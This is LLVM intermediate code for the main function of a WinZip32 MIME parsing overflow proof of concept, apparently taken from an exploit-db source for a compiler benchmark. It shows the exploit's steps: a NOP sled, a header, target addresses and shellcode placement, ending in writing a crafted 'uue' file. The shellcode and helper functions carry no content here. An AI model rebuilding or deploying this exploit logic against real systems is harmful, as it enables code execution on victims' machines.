; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_272.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_272.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_2__ = type { i32, i32 }

@TARGET = common dso_local global i32 0, align 4
@targets = common dso_local global %struct.TYPE_2__* null, align 8
@where = common dso_local global i32 0, align 4
@what = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [70 x i8] c"\0AWinZip32 MIME Parsing Overflow PoC, By Snooq [jinyean@hotmail.com]\0A\0A\00", align 1
@buff = common dso_local global i64 0, align 8
@NOP = common dso_local global i32 0, align 4
@BSIZE = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [44 x i8] c"-> Generating 'uue' file for target #%d...\0A\00", align 1
@header = common dso_local global i32 0, align 4
@HSIZE = common dso_local global i64 0, align 8
@IDXOFF = common dso_local global i64 0, align 8
@PAD = common dso_local global i64 0, align 8
@shellcode = common dso_local global i32 0, align 4
@SSIZE = common dso_local global i64 0, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32, align 4
  %7 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32 0, i32* %6, align 4
  %8 = load i32, i32* @TARGET, align 4
  store i32 %8, i32* %7, align 4
  %9 = load i32, i32* %4, align 4
  %10 = icmp eq i32 %9, 2
  br i1 %10, label %11, label %16

11:                                               ; preds = %2
  %12 = load i8**, i8*** %5, align 8
  %13 = getelementptr inbounds i8*, i8** %12, i64 1
  %14 = load i8*, i8** %13, align 8
  %15 = call i32 @atoi(i8* %14)
  store i32 %15, i32* %7, align 4
  br label %16

16:                                               ; preds = %11, %2
  %17 = load %struct.TYPE_2__*, %struct.TYPE_2__** @targets, align 8
  %18 = load i32, i32* %7, align 4
  %19 = sub nsw i32 %18, 1
  %20 = sext i32 %19 to i64
  %21 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %17, i64 %20
  %22 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %21, i32 0, i32 1
  %23 = load i32, i32* %22, align 4
  store i32 %23, i32* @where, align 4
  %24 = load %struct.TYPE_2__*, %struct.TYPE_2__** @targets, align 8
  %25 = load i32, i32* %7, align 4
  %26 = sub nsw i32 %25, 1
  %27 = sext i32 %26 to i64
  %28 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %24, i64 %27
  %29 = getelementptr inbounds %struct.TYPE_2__, %struct.TYPE_2__* %28, i32 0, i32 0
  %30 = load i32, i32* %29, align 4
  store i32 %30, i32* @what, align 4
  %31 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([70 x i8], [70 x i8]* @.str, i64 0, i64 0))
  %32 = load i64, i64* @buff, align 8
  %33 = load i32, i32* @NOP, align 4
  %34 = load i32, i32* @BSIZE, align 4
  %35 = call i32 @memset(i64 %32, i32 %33, i32 %34)
  %36 = load i32, i32* %7, align 4
  %37 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([44 x i8], [44 x i8]* @.str.1, i64 0, i64 0), i32 %36)
  %38 = load i64, i64* @buff, align 8
  %39 = load i32, i32* @header, align 4
  %40 = load i64, i64* @HSIZE, align 8
  %41 = call i32 @memcpy(i64 %38, i32 %39, i64 %40)
  %42 = call i32 (...) @filladdr()
  %43 = load i64, i64* @buff, align 8
  %44 = load i64, i64* @HSIZE, align 8
  %45 = add nsw i64 %43, %44
  %46 = load i64, i64* @IDXOFF, align 8
  %47 = add nsw i64 %45, %46
  %48 = add nsw i64 %47, 4
  %49 = load i64, i64* @PAD, align 8
  %50 = add nsw i64 %48, %49
  %51 = load i32, i32* @shellcode, align 4
  %52 = load i64, i64* @SSIZE, align 8
  %53 = call i32 @memcpy(i64 %50, i32 %51, i64 %52)
  %54 = call i32 (...) @buildfile()
  ret i32 0
}

declare dso_local i32 @atoi(i8*) #1

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32 @memset(i64, i32, i32) #1

declare dso_local i32 @memcpy(i64, i32, i64) #1

declare dso_local i32 @filladdr(...) #1

declare dso_local i32 @buildfile(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
